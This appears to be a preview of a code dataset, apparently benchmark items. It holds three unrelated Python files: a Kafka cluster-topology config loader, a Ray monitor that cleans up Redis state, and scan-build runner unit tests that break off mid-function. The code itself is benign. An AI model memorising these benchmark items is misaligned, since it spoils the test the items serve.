gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
# -*- coding: utf-8 -*-
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import glob
import logging
import os
from collections import namedtuple
import six
import yaml
from six.moves import map
from kafka_utils.util.error import ConfigurationError
from kafka_utils.util.error import InvalidConfigurationError
from kafka_utils.util.error import MissingConfigurationError
DEFAULT_KAFKA_TOPOLOGY_BASE_PATH = '/etc/kafka_discovery'
HOME_OVERRIDE = '.kafka_discovery'
class ClusterConfig(
    namedtuple(
        'ClusterConfig',
        ['type', 'name', 'broker_list', 'zookeeper'],
    ),
):
    """Immutable description of a single kafka cluster.

    :param type: cluster type
    :param name: cluster name
    :param broker_list: kafka brokers, either a list of host:port strings
        or a single comma-separated string
    :param zookeeper: zookeeper connection string
    """

    def __ne__(self, other):
        return hash(self) != hash(other)

    def __eq__(self, other):
        # Equality is defined through the normalized hash so that broker and
        # zookeeper ordering (and list-vs-string form) do not matter.
        return hash(self) == hash(other)

    def __hash__(self):
        # Accept broker_list as either a list or a comma-separated string.
        if isinstance(self.broker_list, list):
            brokers = self.broker_list
        else:
            brokers = self.broker_list.split(',')
        zookeepers = self.zookeeper.split(',')
        # Sort and drop empty entries so ordering and stray commas do not
        # change the hash.
        normalized_brokers = ",".join(sorted(host for host in brokers if host))
        normalized_zookeepers = ",".join(
            sorted(host for host in zookeepers if host))
        return hash((
            self.type,
            self.name,
            normalized_brokers,
            normalized_zookeepers,
        ))
def load_yaml_config(config_path):
    """Read the file at *config_path* and return its parsed YAML content."""
    with open(config_path) as handle:
        return yaml.safe_load(handle)
class TopologyConfiguration(object):
    """Topology configuration for a kafka cluster.

    Reads a cluster_type.yaml from the kafka_topology_path.

    Example config file:

    .. code-block:: yaml

       clusters:
         cluster1:
           broker_list:
             - "broker1:9092"
             - "broker2:9092"
           zookeeper: "zookeeper1:2181/mykafka"
         cluster2:
           broker_list:
             - "broker3:9092"
             - "broker4:9092"
           zookeeper: "zookeeper2:2181/mykafka"
       local_config:
         cluster: cluster1

    :param cluster_type: kafka cluster type.
    :type cluster_type: string
    :param kafka_topology_path: path of the directory containing
        the kafka topology.yaml config
    :type kafka_topology_path: string
    """

    def __init__(
        self,
        cluster_type,
        kafka_topology_path=DEFAULT_KAFKA_TOPOLOGY_BASE_PATH
    ):
        self.kafka_topology_path = kafka_topology_path
        self.cluster_type = cluster_type
        self.log = logging.getLogger(self.__class__.__name__)
        self.clusters = None
        self.local_config = None
        # Parse the topology file eagerly; constructing a
        # TopologyConfiguration for a missing file raises immediately.
        self.load_topology_config()

    def __eq__(self, other):
        return all([
            self.cluster_type == other.cluster_type,
            self.clusters == other.clusters,
            self.local_config == other.local_config,
        ])

    def __ne__(self, other):
        return not (self == other)

    def load_topology_config(self):
        """Load the topology configuration.

        Populates self.clusters and self.local_config from the
        <cluster_type>.yaml file under kafka_topology_path.

        :raises MissingConfigurationError: if the topology file is absent
        :raises InvalidConfigurationError: if it lacks a 'clusters' key
        """
        config_path = os.path.join(
            self.kafka_topology_path,
            '{id}.yaml'.format(id=self.cluster_type),
        )
        self.log.debug("Loading configuration from %s", config_path)
        if not os.path.isfile(config_path):
            raise MissingConfigurationError(
                "Topology configuration {0} for cluster {1} "
                "does not exist".format(
                    config_path,
                    self.cluster_type,
                )
            )
        topology_config = load_yaml_config(config_path)
        self.log.debug("Topology configuration %s", topology_config)
        try:
            self.clusters = topology_config['clusters']
        except KeyError:
            self.log.exception("Invalid topology file")
            raise InvalidConfigurationError("Invalid topology file {0}".format(
                config_path))
        # local_config is optional; leave it as None when absent.
        if 'local_config' in topology_config:
            self.local_config = topology_config['local_config']

    def get_all_clusters(self):
        """Return a ClusterConfig for every cluster in the topology."""
        return [
            ClusterConfig(
                type=self.cluster_type,
                name=cluster_name,
                broker_list=cluster_conf['broker_list'],
                zookeeper=cluster_conf['zookeeper'],
            )
            for cluster_name, cluster_conf in six.iteritems(self.clusters)
        ]

    def get_cluster_by_name(self, name):
        """Return the ClusterConfig named *name*.

        :raises ConfigurationError: if no such cluster exists
        """
        try:
            cluster = self.clusters[name]
        except KeyError:
            raise ConfigurationError("No cluster with name: {0}".format(name))
        return ClusterConfig(
            type=self.cluster_type,
            name=name,
            broker_list=cluster['broker_list'],
            zookeeper=cluster['zookeeper'],
        )

    def get_local_cluster(self):
        """Return the ClusterConfig referenced by local_config.

        :raises ConfigurationError: if no local cluster is configured
        :raises InvalidConfigurationError: if local_config points at a
            cluster that does not exist or is malformed
        """
        if not self.local_config:
            raise ConfigurationError("No default local cluster configured")
        try:
            local_name = self.local_config['cluster']
            local_cluster = self.clusters[local_name]
            return ClusterConfig(
                type=self.cluster_type,
                name=local_name,
                broker_list=local_cluster['broker_list'],
                zookeeper=local_cluster['zookeeper'])
        except KeyError:
            self.log.exception("Invalid topology file")
            raise InvalidConfigurationError("Invalid topology file")

    def __repr__(self):
        return ("TopologyConfig: cluster_type {0}, clusters: {1},"
                "local_config {2}".format(
                    self.cluster_type,
                    self.clusters,
                    self.local_config
                ))
def get_conf_dirs():
    """Return the list of directories to search for discovery files.

    Order encodes precedence: $KAFKA_DISCOVERY_DIR first (when set), then
    ~/.kafka_discovery (when it exists), then the system-wide default path.
    """
    config_dirs = []
    env_dir = os.environ.get("KAFKA_DISCOVERY_DIR")
    if env_dir:
        config_dirs.append(env_dir)
    home = os.environ.get("HOME")
    if home:
        home_config = os.path.join(os.path.abspath(home), HOME_OVERRIDE)
        # Only add the per-user override when the directory actually exists.
        if os.path.isdir(home_config):
            config_dirs.append(home_config)
    config_dirs.append(DEFAULT_KAFKA_TOPOLOGY_BASE_PATH)
    return config_dirs
def get_cluster_config(
    cluster_type,
    cluster_name=None,
    kafka_topology_base_path=None,
):
    """Return the cluster configuration.
    Use the local cluster if cluster_name is not specified.

    :param cluster_type: the type of the cluster
    :type cluster_type: string
    :param cluster_name: the name of the cluster
    :type cluster_name: string
    :param kafka_topology_base_path: base path to look for <cluster_type>.yaml
    :type kafka_topology_base_path: string
    :returns: the cluster
    :rtype: ClusterConfig
    :raises MissingConfigurationError: if no config dir contains a topology
        file for cluster_type
    """
    if not kafka_topology_base_path:
        config_dirs = get_conf_dirs()
    else:
        config_dirs = [kafka_topology_base_path]

    topology = None
    # config_dirs is ordered by precedence (env override, home override,
    # system default).  Stop at the first directory that has a topology
    # file; without the break a lower-precedence directory would overwrite
    # the higher-precedence configuration.
    for config_dir in config_dirs:
        try:
            topology = TopologyConfiguration(
                cluster_type,
                config_dir,
            )
        except MissingConfigurationError:
            pass
        else:
            break
    if not topology:
        raise MissingConfigurationError(
            "No available configuration for type {0}".format(cluster_type),
        )

    if cluster_name:
        return topology.get_cluster_by_name(cluster_name)
    return topology.get_local_cluster()
def iter_configurations(kafka_topology_base_path=None):
    """Cluster topology iterator.
    Iterate over all the topologies available in config.
    """
    if kafka_topology_base_path:
        config_dirs = [kafka_topology_base_path]
    else:
        config_dirs = get_conf_dirs()

    seen_types = set()
    for config_dir in config_dirs:
        for yaml_path in glob.glob('{0}/*.yaml'.format(config_dir)):
            # Strip the directory and the '.yaml' suffix to get the type.
            cluster_type = os.path.basename(yaml_path)[:-5]
            # A type already yielded from a higher-precedence directory
            # shadows the same type in later directories.
            if cluster_type in seen_types:
                continue
            try:
                topology = TopologyConfiguration(
                    cluster_type,
                    config_dir,
                )
            except ConfigurationError:
                continue
            seen_types.add(cluster_type)
            yield topology
| |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
from collections import Counter
import json
import logging
import redis
import time
import ray
from ray.services import get_ip_address, get_port
import ray.utils
from ray.utils import binary_to_object_id, binary_to_hex, hex_to_binary
# Import flatbuffer bindings.
from ray.core.generated.SubscribeToDBClientTableReply \
import SubscribeToDBClientTableReply
from ray.core.generated.DriverTableMessage import DriverTableMessage
# These variables must be kept in sync with the C codebase.
# common/common.h
HEARTBEAT_TIMEOUT_MILLISECONDS = 100  # sleep between monitor rounds (see Monitor.run)
NUM_HEARTBEATS_TIMEOUT = 100  # missed heartbeats before a plasma manager is timed out
DB_CLIENT_ID_SIZE = 20  # length in bytes of a database client ID
NIL_ID = b"\xff" * DB_CLIENT_ID_SIZE  # sentinel "no client" ID
# common/task.h
TASK_STATUS_LOST = 32
# common/state/redis.cc
# Redis pubsub channel names used by Monitor.subscribe / process_messages.
PLASMA_MANAGER_HEARTBEAT_CHANNEL = b"plasma_managers"
DRIVER_DEATH_CHANNEL = b"driver_deaths"
# common/redis_module/ray_redis_module.cc
OBJECT_PREFIX = "OL:"
DB_CLIENT_PREFIX = "CL:"
DB_CLIENT_TABLE_NAME = b"db_clients"
# local_scheduler/local_scheduler.h
LOCAL_SCHEDULER_CLIENT_TYPE = b"local_scheduler"
# plasma/plasma_manager.cc
PLASMA_MANAGER_CLIENT_TYPE = b"plasma_manager"
# Set up module-level logging for the monitor process.
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.INFO)
class Monitor(object):
    """A monitor for Ray processes.

    The monitor is in charge of cleaning up the tables in the global state
    after processes have died. The monitor is currently not responsible for
    detecting component failures.

    Attributes:
        redis: A connection to the Redis server.
        subscribe_client: A pubsub client for the Redis server. This is used to
            receive notifications about failed components.
        subscribed: A dictionary mapping channel names (str) to whether or not
            the subscription to that channel has succeeded yet (bool).
        dead_local_schedulers: A set of the local scheduler IDs of all of the
            local schedulers that were up at one point and have died since
            then.
        live_plasma_managers: A counter mapping live plasma manager IDs to the
            number of heartbeats that have passed since we last heard from that
            plasma manager. A plasma manager is live if we received a heartbeat
            from it at any point, and if it has not timed out.
        dead_plasma_managers: A set of the plasma manager IDs of all the plasma
            managers that were up at one point and have died since then.
    """

    def __init__(self, redis_address, redis_port):
        # Initialize the Redis clients.
        self.state = ray.experimental.state.GlobalState()
        self.state._initialize_global_state(redis_address, redis_port)
        self.redis = redis.StrictRedis(host=redis_address, port=redis_port,
                                       db=0)
        # TODO(swang): Update pubsub client to use ray.experimental.state once
        # subscriptions are implemented there.
        self.subscribe_client = self.redis.pubsub()
        self.subscribed = {}
        # Initialize data structures to keep track of the active database
        # clients.
        self.dead_local_schedulers = set()
        self.live_plasma_managers = Counter()
        self.dead_plasma_managers = set()

    def subscribe(self, channel):
        """Subscribe to the given channel.

        Args:
            channel (str): The channel to subscribe to.

        Raises:
            Exception: An exception is raised if the subscription fails.
        """
        self.subscribe_client.subscribe(channel)
        # Subscription is confirmed asynchronously by subscribe_handler.
        self.subscribed[channel] = False

    def cleanup_actors(self):
        """Recreate any live actors whose corresponding local scheduler died.

        For any live actor whose local scheduler just died, we choose a new
        local scheduler and broadcast a notification to create that actor.
        """
        actor_info = self.state.actors()
        for actor_id, info in actor_info.items():
            if (not info["removed"] and
                    info["local_scheduler_id"] in self.dead_local_schedulers):
                # Choose a new local scheduler to run the actor.
                local_scheduler_id = ray.utils.select_local_scheduler(
                    info["driver_id"], self.state.local_schedulers(),
                    info["num_gpus"], self.redis)
                # The new local scheduler should not be the same as the old
                # local scheduler. TODO(rkn): This should not be an assert, it
                # should be something more benign.
                assert (binary_to_hex(local_scheduler_id) !=
                        info["local_scheduler_id"])
                # Announce to all of the local schedulers that the actor should
                # be recreated on this new local scheduler.
                ray.utils.publish_actor_creation(
                    hex_to_binary(actor_id), hex_to_binary(info["driver_id"]),
                    local_scheduler_id, True, self.redis)
                log.info("Actor {} for driver {} was on dead local scheduler "
                         "{}. It is being recreated on local scheduler {}"
                         .format(actor_id, info["driver_id"],
                                 info["local_scheduler_id"],
                                 binary_to_hex(local_scheduler_id)))
                # Update the actor info in Redis.
                self.redis.hset(b"Actor:" + hex_to_binary(actor_id),
                                "local_scheduler_id", local_scheduler_id)

    def cleanup_task_table(self):
        """Clean up global state for failed local schedulers.

        This marks any tasks that were scheduled on dead local schedulers as
        TASK_STATUS_LOST. A local scheduler is deemed dead if it is in
        self.dead_local_schedulers.
        """
        tasks = self.state.task_table()
        num_tasks_updated = 0
        for task_id, task in tasks.items():
            # See if the corresponding local scheduler is alive.
            if task["LocalSchedulerID"] in self.dead_local_schedulers:
                # If the task is scheduled on a dead local scheduler, mark the
                # task as lost.
                key = binary_to_object_id(hex_to_binary(task_id))
                ok = self.state._execute_command(
                    key, "RAY.TASK_TABLE_UPDATE", hex_to_binary(task_id),
                    ray.experimental.state.TASK_STATUS_LOST, NIL_ID)
                if ok != b"OK":
                    log.warn("Failed to update lost task for dead scheduler.")
                num_tasks_updated += 1
        if num_tasks_updated > 0:
            log.warn("Marked {} tasks as lost.".format(num_tasks_updated))

    def cleanup_object_table(self):
        """Clean up global state for failed plasma managers.

        This removes dead plasma managers from any location entries in the
        object table. A plasma manager is deemed dead if it is in
        self.dead_plasma_managers.
        """
        # TODO(swang): Also kill the associated plasma store, since it's no
        # longer reachable without a plasma manager.
        objects = self.state.object_table()
        num_objects_removed = 0
        for object_id, obj in objects.items():
            manager_ids = obj["ManagerIDs"]
            if manager_ids is None:
                continue
            for manager in manager_ids:
                if manager in self.dead_plasma_managers:
                    # If the object was on a dead plasma manager, remove that
                    # location entry.
                    ok = self.state._execute_command(object_id,
                                                     "RAY.OBJECT_TABLE_REMOVE",
                                                     object_id.id(),
                                                     hex_to_binary(manager))
                    if ok != b"OK":
                        log.warn("Failed to remove object location for dead "
                                 "plasma manager.")
                    num_objects_removed += 1
        if num_objects_removed > 0:
            log.warn("Marked {} objects as lost.".format(num_objects_removed))

    def scan_db_client_table(self):
        """Scan the database client table for dead clients.

        After subscribing to the client table, it's necessary to call this
        before reading any messages from the subscription channel. This ensures
        that we do not miss any notifications for deleted clients that occurred
        before we subscribed.
        """
        clients = self.state.client_table()
        for node_ip_address, node_clients in clients.items():
            for client in node_clients:
                db_client_id = client["DBClientID"]
                client_type = client["ClientType"]
                if client["Deleted"]:
                    if client_type == LOCAL_SCHEDULER_CLIENT_TYPE:
                        self.dead_local_schedulers.add(db_client_id)
                    elif client_type == PLASMA_MANAGER_CLIENT_TYPE:
                        self.dead_plasma_managers.add(db_client_id)

    def subscribe_handler(self, channel, data):
        """Handle a subscription success message from Redis."""
        log.debug("Subscribed to {}, data was {}".format(channel, data))
        self.subscribed[channel] = True

    def db_client_notification_handler(self, channel, data):
        """Handle a notification from the db_client table from Redis.

        This handler processes notifications from the db_client table.
        Notifications should be parsed using the SubscribeToDBClientTableReply
        flatbuffer. Deletions are processed, insertions are ignored. Cleanup of
        the associated state in the state tables should be handled by the
        caller.
        """
        notification_object = (SubscribeToDBClientTableReply
                               .GetRootAsSubscribeToDBClientTableReply(data,
                                                                       0))
        db_client_id = binary_to_hex(notification_object.DbClientId())
        client_type = notification_object.ClientType()
        is_insertion = notification_object.IsInsertion()

        # If the update was an insertion, we ignore it.
        if is_insertion:
            return

        # If the update was a deletion, add them to our accounting for dead
        # local schedulers and plasma managers.
        log.warn("Removed {}, client ID {}".format(client_type, db_client_id))
        if client_type == LOCAL_SCHEDULER_CLIENT_TYPE:
            if db_client_id not in self.dead_local_schedulers:
                self.dead_local_schedulers.add(db_client_id)
        elif client_type == PLASMA_MANAGER_CLIENT_TYPE:
            if db_client_id not in self.dead_plasma_managers:
                self.dead_plasma_managers.add(db_client_id)
            # Stop tracking this plasma manager's heartbeats, since it's
            # already dead.
            del self.live_plasma_managers[db_client_id]

    def plasma_manager_heartbeat_handler(self, channel, data):
        """Handle a plasma manager heartbeat from Redis.

        This resets the number of heartbeats that we've missed from this plasma
        manager.
        """
        # The first DB_CLIENT_ID_SIZE characters are the client ID.
        db_client_id = data[:DB_CLIENT_ID_SIZE]
        # Reset the number of heartbeats that we've missed from this plasma
        # manager.
        self.live_plasma_managers[db_client_id] = 0

    def driver_removed_handler(self, channel, data):
        """Handle a notification that a driver has been removed.

        This releases any GPU resources that were reserved for that driver in
        Redis.
        """
        message = DriverTableMessage.GetRootAsDriverTableMessage(data, 0)
        driver_id = message.DriverId()
        log.info("Driver {} has been removed."
                 .format(binary_to_hex(driver_id)))

        # Get a list of the local schedulers.
        client_table = ray.global_state.client_table()
        local_schedulers = []
        for ip_address, clients in client_table.items():
            for client in clients:
                if client["ClientType"] == "local_scheduler":
                    local_schedulers.append(client)

        # Release any GPU resources that have been reserved for this driver in
        # Redis.
        for local_scheduler in local_schedulers:
            if int(local_scheduler["NumGPUs"]) > 0:
                local_scheduler_id = local_scheduler["DBClientID"]

                num_gpus_returned = 0

                # Perform a transaction to return the GPUs.
                with self.redis.pipeline() as pipe:
                    while True:
                        try:
                            # If this key is changed before the transaction
                            # below (the multi/exec block), then the
                            # transaction will not take place.
                            pipe.watch(local_scheduler_id)

                            result = pipe.hget(local_scheduler_id,
                                               "gpus_in_use")
                            gpus_in_use = (dict() if result is None
                                           else json.loads(result))

                            driver_id_hex = binary_to_hex(driver_id)
                            if driver_id_hex in gpus_in_use:
                                num_gpus_returned = gpus_in_use.pop(
                                    driver_id_hex)

                            pipe.multi()
                            pipe.hset(local_scheduler_id, "gpus_in_use",
                                      json.dumps(gpus_in_use))
                            pipe.execute()
                            # If a WatchError is not raised, then the
                            # operations should have gone through atomically.
                            break
                        except redis.WatchError:
                            # Another client must have changed the watched key
                            # between the time we started WATCHing it and the
                            # pipeline's execution. We should just retry.
                            continue

                log.info("Driver {} is returning GPU IDs {} to local "
                         "scheduler {}.".format(binary_to_hex(driver_id),
                                                num_gpus_returned,
                                                local_scheduler_id))

    def process_messages(self):
        """Process all messages ready in the subscription channels.

        This reads messages from the subscription channels and calls the
        appropriate handlers until there are no messages left.
        """
        while True:
            message = self.subscribe_client.get_message()
            if message is None:
                return

            # Parse the message.
            channel = message["channel"]
            data = message["data"]

            # Determine the appropriate message handler.
            message_handler = None
            if not self.subscribed[channel]:
                # If the data was an integer, then the message was a response
                # to an initial subscription request.
                message_handler = self.subscribe_handler
            elif channel == PLASMA_MANAGER_HEARTBEAT_CHANNEL:
                assert(self.subscribed[channel])
                # The message was a heartbeat from a plasma manager.
                message_handler = self.plasma_manager_heartbeat_handler
            elif channel == DB_CLIENT_TABLE_NAME:
                assert(self.subscribed[channel])
                # The message was a notification from the db_client table.
                message_handler = self.db_client_notification_handler
            elif channel == DRIVER_DEATH_CHANNEL:
                assert(self.subscribed[channel])
                # The message was a notification that a driver was removed.
                message_handler = self.driver_removed_handler
            else:
                raise Exception("This code should be unreachable.")

            # Call the handler.
            assert(message_handler is not None)
            message_handler(channel, data)

    def run(self):
        """Run the monitor.

        This function loops forever, checking for messages about dead database
        clients and cleaning up state accordingly.
        """
        # Initialize the subscription channel.
        self.subscribe(DB_CLIENT_TABLE_NAME)
        self.subscribe(PLASMA_MANAGER_HEARTBEAT_CHANNEL)
        self.subscribe(DRIVER_DEATH_CHANNEL)

        # Scan the database table for dead database clients. NOTE: This must be
        # called before reading any messages from the subscription channel.
        # This ensures that we start in a consistent state, since we may have
        # missed notifications that were sent before we connected to the
        # subscription channel.
        self.scan_db_client_table()
        # If there were any dead clients at startup, clean up the associated
        # state in the state tables.
        if len(self.dead_local_schedulers) > 0:
            self.cleanup_task_table()
            self.cleanup_actors()
        if len(self.dead_plasma_managers) > 0:
            self.cleanup_object_table()
        log.debug("{} dead local schedulers, {} plasma managers total, {} "
                  "dead plasma managers".format(
                      len(self.dead_local_schedulers),
                      (len(self.live_plasma_managers) +
                       len(self.dead_plasma_managers)),
                      len(self.dead_plasma_managers)))

        # Handle messages from the subscription channels.
        while True:
            # Record how many dead local schedulers and plasma managers we had
            # at the beginning of this round.
            num_dead_local_schedulers = len(self.dead_local_schedulers)
            num_dead_plasma_managers = len(self.dead_plasma_managers)
            # Process a round of messages.
            self.process_messages()
            # If any new local schedulers or plasma managers were marked as
            # dead in this round, clean up the associated state.
            if len(self.dead_local_schedulers) > num_dead_local_schedulers:
                self.cleanup_task_table()
                self.cleanup_actors()
            if len(self.dead_plasma_managers) > num_dead_plasma_managers:
                self.cleanup_object_table()

            # Handle plasma managers that timed out during this round.
            plasma_manager_ids = list(self.live_plasma_managers.keys())
            for plasma_manager_id in plasma_manager_ids:
                if (self.live_plasma_managers[plasma_manager_id] >=
                        NUM_HEARTBEATS_TIMEOUT):
                    log.warn("Timed out {}".format(PLASMA_MANAGER_CLIENT_TYPE))
                    # Remove the plasma manager from the managers whose
                    # heartbeats we're tracking.
                    del self.live_plasma_managers[plasma_manager_id]
                    # Remove the plasma manager from the db_client table. The
                    # corresponding state in the object table will be cleaned
                    # up once we receive the notification for this db_client
                    # deletion.
                    self.redis.execute_command("RAY.DISCONNECT",
                                               plasma_manager_id)

            # Increment the number of heartbeats that we've missed from each
            # plasma manager.
            for plasma_manager_id in self.live_plasma_managers:
                self.live_plasma_managers[plasma_manager_id] += 1

            # Wait for a heartbeat interval before processing the next round of
            # messages.
            time.sleep(HEARTBEAT_TIMEOUT_MILLISECONDS * 1e-3)
if __name__ == "__main__":
    # Parse the Redis address the monitor should connect to.
    arg_parser = argparse.ArgumentParser(
        description=("Parse Redis server for the "
                     "monitor to connect to."))
    arg_parser.add_argument("--redis-address", required=True, type=str,
                            help="the address to use for Redis")
    parsed_args = arg_parser.parse_args()

    redis_ip_address = get_ip_address(parsed_args.redis_address)
    redis_port = get_port(parsed_args.redis_address)

    # Initialize the global state.
    ray.global_state._initialize_global_state(redis_ip_address, redis_port)

    monitor = Monitor(redis_ip_address, redis_port)
    monitor.run()
| |
# -*- coding: utf-8 -*-
# The LLVM Compiler Infrastructure
#
# This file is distributed under the University of Illinois Open Source
# License. See LICENSE.TXT for details.
import libear
import libscanbuild.runner as sut
import unittest
import re
import os
import os.path
class FilteringFlagsTest(unittest.TestCase):
    """Checks how sut.classify_parameters captures and filters flags."""

    def _classify(self, flags):
        """Classify a canonical compile command extended with *flags*."""
        return sut.classify_parameters(['clang', '-c', 'source.c'] + flags)

    def test_language_captured(self):
        def language_of(flags):
            return self._classify(flags)['language']

        self.assertEqual(None, language_of([]))
        self.assertEqual('c', language_of(['-x', 'c']))
        self.assertEqual('cpp', language_of(['-x', 'cpp']))

    def test_arch(self):
        def archs_of(flags):
            return self._classify(flags)['arch_list']

        self.assertEqual([], archs_of([]))
        self.assertEqual(['mips'], archs_of(['-arch', 'mips']))
        self.assertEqual(['mips', 'i386'],
                         archs_of(['-arch', 'mips', '-arch', 'i386']))

    def assertFlagsChanged(self, expected, flags):
        self.assertEqual(expected, self._classify(flags)['flags'])

    def assertFlagsUnchanged(self, flags):
        self.assertFlagsChanged(flags, flags)

    def assertFlagsFiltered(self, flags):
        self.assertFlagsChanged([], flags)

    def test_optimalizations_pass(self):
        # Optimization levels are relevant to analysis, so they survive.
        for flag in ('-O', '-O1', '-Os', '-O2', '-O3'):
            self.assertFlagsUnchanged([flag])

    def test_include_pass(self):
        # Include-path flags survive in every spelling.
        for flags in (
            [],
            ['-include', '/usr/local/include'],
            ['-I.'],
            ['-I', '.'],
            ['-I/usr/local/include'],
            ['-I', '/usr/local/include'],
            ['-I/opt', '-I', '/opt/otp/include'],
            ['-isystem', '/path'],
            ['-isystem=/path'],
        ):
            self.assertFlagsUnchanged(flags)

    def test_define_pass(self):
        # Preprocessor defines/undefines survive.
        for flags in (
            ['-DNDEBUG'],
            ['-UNDEBUG'],
            ['-Dvar1=val1', '-Dvar2=val2'],
            ['-Dvar="val ues"'],
        ):
            self.assertFlagsUnchanged(flags)

    def test_output_filtered(self):
        self.assertFlagsFiltered(['-o', 'source.o'])

    def test_some_warning_filtered(self):
        # Warning-enabling flags are dropped; warning-disabling ones kept.
        self.assertFlagsFiltered(['-Wall'])
        self.assertFlagsFiltered(['-Wnoexcept'])
        self.assertFlagsFiltered(['-Wreorder', '-Wunused', '-Wundef'])
        self.assertFlagsUnchanged(['-Wno-reorder', '-Wno-unused'])

    def test_compile_only_flags_pass(self):
        for flags in (
            ['-std=C99'],
            ['-nostdinc'],
            ['-isystem', '/image/debian'],
            ['-iprefix', '/usr/local'],
            ['-iquote=me'],
            ['-iquote', 'me'],
        ):
            self.assertFlagsUnchanged(flags)

    def test_compile_and_link_flags_pass(self):
        for flags in (
            ['-fsinged-char'],
            ['-fPIC'],
            ['-stdlib=libc++'],
            ['--sysroot', '/'],
            ['-isysroot', '/'],
        ):
            self.assertFlagsUnchanged(flags)

    def test_some_flags_filtered(self):
        for flags in (
            ['-g'],
            ['-fsyntax-only'],
            ['-save-temps'],
            ['-init', 'my_init'],
            ['-sectorder', 'a', 'b', 'c'],
        ):
            self.assertFlagsFiltered(flags)
class Spy(object):
    """Test double: records the argument of the last call, returns a canned
    result."""

    def __init__(self):
        self.arg = None      # last value passed to call()
        self.success = 0     # value call() returns

    def call(self, params):
        """Remember *params* and return the configured success value."""
        self.arg = params
        return self.success
class RunAnalyzerTest(unittest.TestCase):
    """End-to-end tests for sut.run_analyzer on tiny C++ sources."""

    @staticmethod
    def run_analyzer(content, failures_report):
        """Analyze *content* in a scratch dir; return (result, spy argument)."""
        with libear.TemporaryDirectory() as tmpdir:
            source_file = os.path.join(tmpdir, 'test.cpp')
            with open(source_file, 'w') as handle:
                handle.write(content)

            parameters = {
                'clang': 'clang',
                'directory': os.getcwd(),
                'flags': [],
                'direct_args': [],
                'file': source_file,
                'output_dir': tmpdir,
                'output_format': 'plist',
                'output_failures': failures_report
            }
            spy = Spy()
            return (sut.run_analyzer(parameters, spy.call), spy.arg)

    def test_run_analyzer(self):
        # Well-formed source: analysis succeeds, no failure forwarded.
        source = "int div(int n, int d) { return n / d; }"
        (result, forwarded) = RunAnalyzerTest.run_analyzer(source, False)
        self.assertEqual(None, forwarded)
        self.assertEqual(0, result['exit_code'])

    def test_run_analyzer_crash(self):
        # Broken source (missing semicolon): non-zero exit, nothing forwarded.
        source = "int div(int n, int d) { return n / d }"
        (result, forwarded) = RunAnalyzerTest.run_analyzer(source, False)
        self.assertEqual(None, forwarded)
        self.assertEqual(1, result['exit_code'])

    def test_run_analyzer_crash_and_forwarded(self):
        # With failure reporting enabled the crash details are forwarded.
        source = "int div(int n, int d) { return n / d }"
        (_, forwarded) = RunAnalyzerTest.run_analyzer(source, True)
        self.assertEqual('crash', forwarded['error_type'])
        self.assertEqual(1, forwarded['exit_code'])
        self.assertTrue(len(forwarded['error_output']) > 0)
class ReportFailureTest(unittest.TestCase):
    """Tests that sut.report_failure dumps the expected artifact files."""

    def assertUnderFailures(self, path):
        """Check that *path* lives directly inside a 'failures' directory."""
        self.assertEqual('failures', os.path.basename(os.path.dirname(path)))

    def test_report_failure_create_files(self):
        with libear.TemporaryDirectory() as tmpdir:
            # Create the input file the failure report refers to.
            source_file = os.path.join(tmpdir, 'test.c')
            with open(source_file, 'w') as handle:
                handle.write('int main() { return 0')
            uname_msg = ' '.join(os.uname()) + os.linesep
            error_msg = 'this is my error output'

            # Execute the unit under test.
            opts = {
                'clang': 'clang',
                'directory': os.getcwd(),
                'flags': [],
                'file': source_file,
                'output_dir': tmpdir,
                'language': 'c',
                'error_type': 'other_error',
                'error_output': error_msg,
                'exit_code': 13
            }
            sut.report_failure(opts)

            # Collect every file report_failure produced, remembering the
            # generated preprocessor (.i) file.
            contents = dict()
            pp_file = None
            for root, _, files in os.walk(tmpdir):
                for name in files:
                    path = os.path.join(root, name)
                    with open(path, 'r') as handle:
                        contents[path] = handle.readlines()
                    if re.match(r'^(.*/)+clang(.*)\.i$', path):
                        pp_file = path

            # Preprocessor file was generated under .../failures/.
            self.assertUnderFailures(pp_file)
            # Info file was generated and its content dumped.
            info_file = pp_file + '.info.txt'
            self.assertTrue(info_file in contents)
            self.assertEqual('Other Error\n', contents[info_file][1])
            self.assertEqual(uname_msg, contents[info_file][3])
            # Error file was generated and its content dumped.
            error_file = pp_file + '.stderr.txt'
            self.assertTrue(error_file in contents)
            self.assertEqual([error_msg], contents[error_file])
class AnalyzerTest(unittest.TestCase):
    """Tests for the individual analysis pipeline steps in sut."""

    def test_nodebug_macros_appended(self):
        def run(flags):
            spy = Spy()
            opts = {'flags': flags, 'force_debug': True}
            self.assertEqual(spy.success,
                             sut.filter_debug_flags(opts, spy.call))
            return spy.arg['flags']

        self.assertEqual(['-UNDEBUG'], run([]))
        self.assertEqual(['-DNDEBUG', '-UNDEBUG'], run(['-DNDEBUG']))
        self.assertEqual(['-DSomething', '-UNDEBUG'], run(['-DSomething']))

    def test_set_file_relative_path(self):
        def check(expected, opts):
            spy = Spy()
            self.assertEqual(spy.success,
                             sut.set_file_path_relative(opts, spy.call))
            self.assertEqual(expected, spy.arg['file'])

        check('source.c',
              {'file': '/home/me/source.c', 'directory': '/home/me'})
        check('me/source.c',
              {'file': '/home/me/source.c', 'directory': '/home'})
        check('../home/me/source.c',
              {'file': '/home/me/source.c', 'directory': '/tmp'})

    def test_set_language_fall_through(self):
        def check(expected, opts):
            spy = Spy()
            opts.update({'compiler': 'c', 'file': 'test.c'})
            self.assertEqual(spy.success, sut.language_check(opts, spy.call))
            self.assertEqual(expected, spy.arg['language'])

        check('c', {'language': 'c', 'flags': []})
        check('c++', {'language': 'c++', 'flags': []})

    def test_set_language_stops_on_not_supported(self):
        # Unsupported languages stop the chain without calling the spy.
        spy = Spy()
        opts = {
            'compiler': 'c',
            'flags': [],
            'file': 'test.java',
            'language': 'java'
        }
        self.assertIsNone(sut.language_check(opts, spy.call))
        self.assertIsNone(spy.arg)

    def test_set_language_sets_flags(self):
        def check(expected, opts):
            spy = Spy()
            opts.update({'compiler': 'c', 'file': 'test.c'})
